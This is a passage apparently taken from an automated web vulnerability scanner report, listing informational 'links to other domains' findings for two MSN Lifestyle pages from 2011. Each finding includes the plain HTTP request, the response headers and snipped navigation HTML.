<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

17.124. http://lifestyle.msn.com/relationships/your-money-today/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/your-money-today/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.msn.com/relationships/your-money-today/article.aspx?cp-documentid=22782076&gt1=32078

The response contains the following links to other domains:

http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_RBK_585X368
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/MSNLife
http://twitter.com/MSNRelationshpz
http://twitter.com/MSN_Style
http://twitter.com/share
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=couples+and+finances+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=money+fights+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=spending+styles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/MSNLife
http://www.myhomemsn.com/
http://www.redbookmag.com/?link=lgo&dom=msn&src=syn&con=art&mag=rbk
http://www.redbookmag.com/love-sex/advice/cheap-date-ideas?link=rel&dom=msn&src=syn&con=art&mag=rbk
http://www.redbookmag.com/love-sex/advice/secrets-behind-great-marriages?link=rel&dom=msn&src=syn&con=art&mag=rbk
http://www.redbookmag.com/money-career/tips-advice/bad-economy-upside?link=rel&dom=msn&src=syn&con=art&mag=rbk
http://www.redbookmag.com/money-career/tips-advice/budgets/money-baby-cost?link=rel&dom=msn&src=syn&con=art&mag=rbk
http://www.redbookmag.com/money-career/tips-advice/money-saving-strategies?link=rel&dom=msn&src=syn&con=art&mag=rbk
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660823&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Frelationships%2Fyour-money-today%2Farticle.aspx%3Fcp-documentid%3D22782076%26gt1%3D32078&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /relationships/your-money-today/article.aspx?cp-documentid=22782076&gt1=32078 HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a62d6f2d92814e939fb824060977d7e2; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D8075880FED14A6C90BC6B015B8138BF; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 30791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660823&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Frelationships%2Fyour-money-today%2Farticle.aspx%3Fcp-documentid%3D22782076%26gt1%3D32078&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24">SAG awards</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24">kim kardashian</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24">next superman</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24">kacey jordan</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.redbookmag.com?link=lgo&dom=msn&src=syn&con=art&mag=rbk"><img src="http://blstb.msn.com/i/C0/1EFB11F48E1BCF80448DE97CF0EE37.jpg" width="70" height="30" alt="Redbook" />
...[SNIP]...
<li><a href="http://www.redbookmag.com/love-sex/advice/cheap-date-ideas?link=rel&dom=msn&src=syn&con=art&mag=rbk">26 Fun, Cheap Date Ideas</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/money-career/tips-advice/money-saving-strategies?link=rel&dom=msn&src=syn&con=art&mag=rbk">Surprisingly Easy Ways to Save Money</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/love-sex/advice/secrets-behind-great-marriages?link=rel&dom=msn&src=syn&con=art&mag=rbk">4 Secrets to a Spectacular Marriage</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/money-career/tips-advice/budgets/money-baby-cost?link=rel&dom=msn&src=syn&con=art&mag=rbk">How Much Does It Really Cost to Have a Baby?</a>
...[SNIP]...
<li><a href="http://www.redbookmag.com/money-career/tips-advice/bad-economy-upside?link=rel&dom=msn&src=syn&con=art&mag=rbk">10 Good Things About Our Bad Economy</a>
...[SNIP]...
<p><a href="http://www.facebook.com/MSNLife"><img src="http://blstb.msn.com/i/8B/1FC16DD76C3B9D615FC9D59FC47E.gif" width="170" height="55" alt="Like MSN Lifestyle on Facebook" class="img1" />
...[SNIP]...
</strong> Get additional content on <a href="http://www.bing.com/search?q=couples+and+finances+site%3Alifestyle.msn.com&go=&form=MSN037">couples and finances</a>, <a href="http://www.bing.com/search?q=spending+styles+site%3Alifestyle.msn.com&go=&form=MSN037">spending styles</a>, and <a href="http://www.bing.com/search?q=money+fights+site%3Alifestyle.msn.com&go=&form=MSN037">money fights</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.msn.com/relationships/your-money-today/article.aspx?cp-documentid=22782076&OCID=TWT">Tweet</a>
...[SNIP]...
</script><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...
<div><script src="http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_RBK_585X368" type="text/javascript"></script>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
<span><a href="http://twitter.com/MSNLife">@MSN Life</a>
...[SNIP]...
<span><a href="http://twitter.com/MSN_Style">@MSN_Style</a>
...[SNIP]...
<span><a href="http://twitter.com/MSNRelationshpz">@MSNRelationshpz</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

17.125. http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-home/cleaning-organizing/staticslideshowrs.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx?cp-documentid=27433532&gt1=32026

The response contains the following links to other domains:

http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://insidemsn.wordpress.com/
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js.
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/share
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.delish.com/cooking-shows/food-tv/super-bowl-sunday-recipes-nfl
http://www.myhomemsn.com/
http://www.realsimple.com/
http://www.realsimple.com/new-uses-for-old-things/new-uses-baking-soda/baking-soda-metal-polish-10000001123016/index.html
http://www.realsimple.com/new-uses-for-old-things/new-uses-baking/paper-doily-as-a-cake-decoration-00000000051677/index.html
http://www.realsimple.com/new-uses-for-old-things/new-uses-cleaning/aluminum-foil-glassware-scrubber-10000001154428/index.html
http://www.realsimple.com/new-uses-for-old-things/new-uses-cooking/straw-as-ketchup-unclogger-00000000049956/index.html
http://www.realsimple.com/new-uses-for-old-things/new-uses-dryer-sheets/new-use-dryer-sheets-00000000013069/index.html
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660832&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-home%2Fcleaning-organizing%2Fstaticslideshowrs.aspx%3Fcp-documentid%3D27433532%26gt1%3D32026&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-home/cleaning-organizing/staticslideshowrs.aspx?cp-documentid=27433532&gt1=32026 HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA16
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e2e98a32c834441abf1c0d0248189e63; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=37B484AEBB5E468DABA3A816DDB527CA; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 56663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
